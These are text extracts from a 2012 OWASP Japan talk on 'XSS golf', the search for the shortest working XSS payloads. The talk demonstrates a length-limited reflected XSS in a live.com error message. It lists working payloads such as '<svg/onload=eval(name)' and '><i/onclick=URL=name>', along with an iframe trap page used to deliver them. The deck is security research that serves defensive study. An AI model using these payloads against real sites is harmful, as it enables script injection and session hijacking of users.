Short talk of XSS - 短いXSSの話 -

3.8K Views

June 27, 12

スライド概要

OWSP Japan 2nd Local Chapter Meeting資料

シェア

またはPlayer版

埋め込む »CMSなどでJSが使えない場合

関連スライド

各ページのテキスト
1.

Short talk of XSS 短いXSSの話 Jun 27 2012 Yosuke HASEGAWA OWASP Japan 2nd local chapter meeting

7.

What!?

8.
[beta]
https://*.live.com/?param=><h1>XSSed</h1><!-<!-- Version: "13.000.20177.00" Server:
BAYIDSLEG1C38; DateTime: 2012/05/01 15:13:23 -->
<input type="hidden" value="MESSAGE: A
potentially dangerous Request.QueryString value
was detected from the client
(param="><h1>XSSed</h1><!--").
SOURCE: System.Web FORM:" />

XSS caused by error message

9.

Microsoft “live.com” Over https Needless error message Interesting but not really matter now

11.

alert is common knowledge for XSSers

13.
[beta]
https://*.live.com/?param=><h1>XSSed</h1><!-<!-- Version: "13.000.20177.00" Server:
BAYIDSLEG1C38; DateTime: 2012/05/01 15:13:23 -->
<input type="hidden" value="MESSAGE: A
potentially dangerous Request.QueryString value
was detected from the client
><h1>XSSed</h1><!-(param="><h1>XSSed</h1><!--").
SOURCE: System.Web FORM:" />

22 letters max.

14.

XSS under 22 letters is too hard ><h1>XSSed</h1><!-- … 19 letters ><script>alert(1)</script> … 26 letters ><script>eval(name)</script> … 28 letters

16.

by Gareth Heyes

17.

XSS Golf by Gareth Heyes

18.

Shortest XSS Challanges 19 letters <x/x=&{eval(name)}; // @0x6D6172696F Netscape 4 22 letters <svg/onload=eval(name) // @0x6D6172696F

20.
[beta]
https://*.live.com/?param=><h1>XSSed</h1><!-<!-- Version: "13.000.20177.00" Server:
BAYIDSLEG1C38; DateTime: 2012/05/01 15:13:23 -->
<input type="hidden" value="MESSAGE: A
potentially dangerous Request.QueryString value
was detected from the client
><h1>XSSed</h1><!-(param="><h1>XSSed</h1><!--").
SOURCE: System.Web FORM:" />

22 letters max.

22.

IE has “URL” property ><i/onclick=URL=name> … 21 letters Mario Heiderich’s work // Trap page created by attacker <iframe src="target" name="javascript:alert(1)"> // or use window.open from JavaScript

23.

Did it! XSS Filter is disabled

24.

Variations 20 letters <input type=hidden value=><i/onclick=URL=name> 22 letters <input type=hidden value=""><i/onclick=URL=name>"> 17 letters <input type=text value= onclick=URL=name> Run arbitrary code in 22 letters

25.

Shortest JavaScript to run arbitrary code 10 letters eval(name) 9 letters eval(URL) 8 letters URL=name 6 letters $(URL)

26.

Question? [email protected] [email protected] @hasegawayosuke http://utf-8.jp/ OWASP Japan 2nd local chapter meeting NetAgent http://www.netagent.co.jp/